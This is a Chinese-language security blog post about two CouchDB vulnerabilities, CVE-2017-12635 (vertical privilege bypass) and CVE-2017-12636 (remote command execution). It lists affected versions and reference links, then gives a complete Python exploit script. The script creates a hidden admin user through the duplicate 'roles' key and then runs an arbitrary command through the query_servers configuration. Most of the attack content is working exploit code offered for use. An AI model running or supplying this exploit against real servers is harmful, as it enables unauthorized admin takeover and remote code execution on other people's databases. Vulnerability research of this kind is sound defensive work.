couchdb介绍:
CouchDB是用Erlang开发的面向文档的数据库系统。CouchDB不是一个传统的关系数据库,而是面向文档的数据库,其数据存储方式有点类似lucene的index文件格式,CouchDB最大的意义在于它是一个面向web应用的新一代存储系统。
爆出的是两个漏洞
CVE-2017-12635 垂直权限绕过
CVE-2017-12636 远程命令执行
影响版本:
小于 1.7.0 以及 小于 2.1.1
version1:
version2:
漏洞详情:
已经有很多文章解释了漏洞的成因,这里就不再重复了,给出链接地址:
参考链接:https://justi.cz/security/2017/11/14/couchdb-rce-npm.html
poc验证:https://www.secpulse.com/archives/45917.html
成因分析:https://www.anquanke.com/post/id/87256
p牛已经给出了漏洞演示地址:
这里给出docker-compose
CVE-2017-12636 远程命令执行需要管理员权限,利用CVE-2017-12635 垂直权限绕过直接增加用户即可
自己根据poc改了个exp:
# coding=utf-8 #!/usr/bin/python # Author: haya import sys import json import requests from urllib.request import Request, urlopen from requests.auth import HTTPBasicAuth def get_version(url): response = requests.get(url) db_version = json.loads(response.text) return int(db_version['version'][0:1]) def add_user(ip): url = r'/_users/org.couchdb.user:wooyun' headers = { 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)', 'Content-Type': 'application/json', } data = b""" { "type": "user", "name": "wooyun", "roles": ["_admin"], "roles":[], "password": "wooyun" } """ full_url = ip + url try: res = Request(url=full_url, headers=headers, data=data, method='PUT') html = urlopen(res).read() # print(html) print("Maybe user add success!") except: print('Have a error!The user add failure!') print('Maybe the user is exist!') def cme_exec(target, command, version): session = requests.session() session.headers = { 'Content-Type': 'application/json' } session.put(target + '/_users/org.couchdb.user:wooyun', data='''{ "type": "user", "name": "wooyun", "roles": ["_admin"], "roles": [], "password": "wooyun" }''') session.auth = HTTPBasicAuth('wooyun', 'wooyun') if version == 1: session.put(target + ('/_config/query_servers/cmd'), data=command) else: try: host = session.get(target + '/_membership').json()['all_nodes'][0] session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=command) except: print('The target faild') session.put(target + '/wooyun') session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}') if version == 1: session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}') else: session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}') def main(): target = sys.argv[1] command = '"ping dnslog"' version = get_version(target) add_user(target) cme_exec(target, command, version) if __name__ == '__main__': main()
github地址:https://github.com/hayasec/couchdb_exp